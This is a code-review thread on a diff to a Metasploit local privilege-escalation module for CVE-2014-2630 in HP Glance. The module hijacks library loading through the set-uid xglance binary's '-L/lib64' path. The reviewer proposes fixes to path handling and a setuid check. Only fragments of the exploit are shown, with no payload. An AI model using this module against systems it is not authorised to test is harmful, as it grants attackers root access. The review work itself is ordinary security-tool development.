modules/exploits/linux/local/hp_xglance_priv_esc.rb

```diff
@@ -76,37 +75,24 @@ def exploit_folder
     "#{base_dir}/-L/lib64/"
   end
 
-  # Simplify and standardize uploading a file
-  def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    write_file path, data
-  end
-
-  # Simplify uploading and chmoding a file
-  def upload_and_chmodx(path, data)
-    upload path, data
-    chmod path
-    register_file_for_cleanup path
-  end
-
   # Pull the exploit binary or file (.c typically) from our system
   def exploit_data(file)
     ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
   end
 
   def find_libs
-    libs = cmd_exec 'ldd /opt/perf/bin/xglance-bin | grep libX'
-    /(?<lib>libX.+\.so\.\d) => -L\/lib64/ =~ libs
+    libs = cmd_exec "ldd datastore['GLANCE_PATH'] | grep libX"
+    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
     return nil if lib.nil?
+
     lib
   end
 
   def check
-    unless file? '/opt/perf/bin/xglance-bin'
-      vprint_error "/opt/perf/bin/xglance-bin not found on system"
+    unless file? datastore['GLANCE_PATH']
+      vprint_error "datastore['GLANCE_PATH'] not found on system"
```

Comment:
```suggestion
    unless file? datastore['GLANCE_PATH']
      vprint_error "#{datastore['GLANCE_PATH']} not found on system"
```

Also, the exploit results in privilege escalation as the glance executable is set-uid root, which case a suid check would make more sense:

```suggestion
    unless setuid? datastore['GLANCE_PATH']
      vprint_error "#{datastore['GLANCE_PATH']} not found on system"
```

Also, a helper method is often used, instead of constantly referencing the `datastore` :

```ruby
  def glance_path
    datastore['GLANCE_PATH'].to_s
  end
```